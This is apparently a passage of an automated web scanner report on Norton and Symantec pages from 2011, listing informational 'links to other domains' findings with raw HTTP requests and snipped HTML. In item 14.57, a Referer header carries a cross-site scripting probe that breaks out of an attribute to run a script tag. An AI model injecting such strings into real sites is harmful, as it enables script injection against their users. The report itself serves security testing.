               <img src="/content/en/us/home_homeoffice/images/support/ver1/dtree/button_orderStatus.png" border="0" height="43" width="40" />
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices">Legal Notices</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements">License Agreements</a>
...[SNIP]...
<li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository">Repository</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support">Business Support</a>
...[SNIP]...
<li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales">Business Sales</a>
...[SNIP]...
<li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information">Corporate Information</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.53. http://us.norton.com/theme.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /theme.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /theme.jsp?themeid=nis_nav_2012&inid=us_hho_homepage_hero1_nisnav2012 HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1331
Date: Fri, 09 Sep 2011 21:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39140

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Introducing Norton Internet Security 2012 and Norton Antivirus 2012</title>
<meta http-equiv="Content-Type" content
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
vice includes protection updates and new product features as available during the service period, subject to acceptance of the Symantec Agreement included with this product and available for review at <a href="http://www.symantec.com">www.symantec.com</a>
...[SNIP]...
c provides free 24x7 email, chat and phone support for a period of one year from initial product installation. NortonLive&#8482; Services sold separately. For full details and to access support, go to <a href="http://www.symantec.com/globalsupport">www.symantec.com/globalsupport</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.54. http://us.norton.com/theme.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /theme.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /theme.jsp?themeid=protect_yourself HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=3461
Date: Fri, 09 Sep 2011 21:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Norton Cybercrime Index - Free Download</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<div class="mainBdyWrapBdy" style="width:308px; height: 390px;">
                   <a target="_blank" href="http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget"> <img src="/content/en/us/home_homeoffice/images/theme/cci/CCI_-NortonPageDwnLoad-GadgetAgreeBtn.jpg">
...[SNIP]...
<br/>            
                               <a target="_blank" href="http://www.nortoncybercrimeindex.mobi">http://www.nortoncybercrimeindex.mobi</a>
...[SNIP]...
<div class="mainBdyWrapBdy" style="width:306px; height:390px;">
                   <a href="http://www.nortonfreetools.com/freePCCheckup/"><img src="/content/en/us/home_homeoffice/images/theme/cci/Security-Scan-Button-blk-on-gld-303x52.jpg">
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.55. http://us.norton.com/theme4.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /theme4.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /theme4.jsp?themeid=free_tools_trials2 HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1124
Date: Fri, 09 Sep 2011 21:47:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40638

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Download trials of Nortons Virus Protection and Spyware Remover Tools</title>
<meta http-equiv="Content-Type" conte
...[SNIP]...
<div id="globalNavMainInner2">
<a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'>Small Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href='http://www.symantec.com/business/index.jsp'>Enterprise</a>
...[SNIP]...
<div id="globalNavMainInner4">
<a href='http://www.symantec.com/partners/index.jsp'>Partners</a>
...[SNIP]...
<div id="globalNavMainInner6">
<a href='http://www.symantec.com/about/index.jsp'>About Symantec</a>
...[SNIP]...
<li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&amp;fpage=orderHistory&amp;product_lang=EN' title='Norton Order Status'>Order Status</a>
...[SNIP]...
<br/><a href="http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget" target="_blank">Try It</a>
...[SNIP]...
<h3><a href="https://security.symantec.com/sscv6/WelcomePage.asp">Norton Security Scan</a>
...[SNIP]...
<div class="cbType22"><a href="https://security.symantec.com/sscv6/DownloadInstructions.asp" target="_blank">Try It</a>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<br/> <a href="http://security.symantec.com/nbrt/npe.asp?lcid=1033">Try It</a>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<br /><a href="http://www.facebook.com/apps/application.php?id=310877173418" target="_blank">Try it</a>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"></div>
...[SNIP]...
<li><a href="http://www.symantec.com/norton">Norton Homepage</a>
...[SNIP]...
<li><a href="http://www.symantec.com/norton/community/index.jsp">Norton Forums</a>
...[SNIP]...
<li><a href="http://www.symantec.com/norton/support/index.jsp">Norton Support</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/index.jsp" title="About">About</a>
...[SNIP]...
<span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map">Site Map</a>
...[SNIP]...
<span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal">Legal</a>
...[SNIP]...
<span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy">Privacy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact">Contact</a>
...[SNIP]...
<span><a href="http://www.symantec.com/rss/index.jsp" title="RSS">RSS</a>
...[SNIP]...

14.56. http://www.symantec.com/business/products/categories.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /business/products/categories.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business/products/categories.jsp?pcid=pcat_infrastruct_op HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; bizProdScrollVertical=0; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315622485105-New%7C1336358485105%3B%20event69%3Devent69%7C1336358485107%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520purchasing%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fbusiness%2525252Fproducts%2525252Fcategories.jsp%2525253Fpcid%2525253Dpcat_infrastruct_op%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 77466
Cache-Control: public, max-age=3563
Date: Fri, 09 Sep 2011 21:41:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Security, Backup &amp; Archiving, Server Management, and Storage Software | Symantec Enterprise Products</title>
<m
...[SNIP]...
<div class="promoProdOneCol4Lft">
<a href="http://www.verisign.com/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=sym_bus_prod_lp"><img src="/content/en/us/enterprise/images/promo/b-verisign-promo.jpg" alt="Trust the Leader, VeriSign SSL Certificates, Buy Now" title="Trust the Leader, VeriSign SSL Certificates, Buy Now" class="
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.57. http://www.symantec.com/business/products/purchasing.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /business/products/purchasing.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1 HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9; bizProdScrollVertical=0; s_pers=%20s_nr%3D1315622085200-New%7C1336358085200%3B%20event69%3Devent69%7C1336358085202%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fbusiness%2525252Fproducts%2525252Fpurchasing.jsp%2525253Fpcid%2525253Dpcat_info_risk_comp%25252526pvid%2525253Dfds_1%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 52358
Cache-Control: public, max-age=3599
Date: Fri, 09 Sep 2011 21:34:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>VeriSign Identity Protection Fraud Detection Service: Purchasing Options - S
...[SNIP]...
<li>
<a href="http://us.norton.com/antivirus/" title="AntiVirus">AntiVirus</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/ghost/" title="Backup Software">Backup Software</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/internet-security/" title="Internet Security">Internet Security</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/malware.jsp" title="Malware">Malware</a>
...[SNIP]...
<li>
<a href="http://www.backup.com/" title="Online Backup">Online Backup</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing">Phishing</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware">Spyware</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/" title="Virus Protection">Virus Protection</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal">Virus Removal</a>
...[SNIP]...
<li>
<a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan">Virus Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL">SSL</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates">SSL Certificates</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation">Extended Validation</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal">VeriSign Trust Seal</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication">Two-Factor Authentication</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection">Identity Protection</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan">Malware Scan</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/code-signing/index.html" title="Code Signing">Code Signing</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure">Public Key Infrastructure</a>
...[SNIP]...
<li>
<a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI">PKI</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus">Spyware Doctor with Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit">Performance Toolkit</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/simple-backup/" title="Simple Backup">Simple Backup</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/file-recover/" title="File Recovery">File Recovery</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor">Spyware Doctor</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian">Privacy Guardian</a>
...[SNIP]...
<li>
<a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus">Free Antivirus</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/password-manager/" title="Password Manager">Password Manager</a>
...[SNIP]...
<li>
<a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic">Registry Mechanic</a>
...[SNIP]...

14.58. http://www.symantec.com/business/theme.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /business/theme.jsp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /business/theme.jsp?themeid=contact-verisign HTTP/1.1
Host: www.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/verisign-worldwide/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_nr%3D1315621569527-New%7C1336357569527%3B%20event69%3Devent69%7C1336357569528%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D806960442771%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621570007; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 51820
Cache-Control: public, max-age=1145
Date: Fri, 09 Sep 2011 21:26:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>VeriSign Authentication Services, now a part of Symantec - SSL Certificates, Extended Validation SSL, User Authenti
...[SNIP]...
<br />
                       <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w45290160530800000" target="_blank">Submit inquiry online</a>
...[SNIP]...
<br />
                       <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020" target="_blank">Submit inquiry online</a>
...[SNIP]...
<br />
                       <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020" target="_blank">Submit inquiry online</a>
...[SNIP]...
<br />
                       <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w13490307590800002" target="_blank">Submit inquiry online</a>
...[SNIP]...
<br />
                       <a href="https://forms.verisign.com/websurveys/servlet/ActionMultiplexer?Action_ID=ACT2000&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063" target="_blank">Submit an inquiry online</a>
...[SNIP]...
</strong> If you purchased your VIP Credential from a VIP Member Site, contact the VIP Member Site for assistance. For a list of all member sites, <a href="https://idprotect.verisign.com/wheretouse.v" target="_blank">click here</a>
...[SNIP]...
<strong><a href="http://www.verisign.ch/" target="_blank">Europe Headquarters</a>
...[SNIP]...
<strong><a href="http://www.verisign.in/" target="_blank">India</a>
...[SNIP]...
<strong><a href="http://www.verisign.com.au/" target="_blank">Australia Headquarters</a>
...[SNIP]...
<strong><a href="http://www.verisign.co.jp/" target="_blank">Japan Headquarters </a>
...[SNIP]...
<strong><a href="http://www.verisign.ch/" target="_blank">Switzerland</a>
...[SNIP]...
<strong><a href="http://www.thawte.com/">Africa</a>
...[SNIP]...
<strong><a href="http://www.verisign.co.uk/">United Kingdom</a>
...[SNIP]...
<strong><a href="http://www.verisign.com.br/" target="_blank">Brazil</a>
...[SNIP]...
<strong><a href="http://www.verisignchina.com.cn/" target="_blank">China</a>
...[SNIP]...
</h4>
                   <a href="http://www.verisign.com/support/contact/index.html" target="_blank">VeriSign Support Contacts</a>
...[SNIP]...
<br />
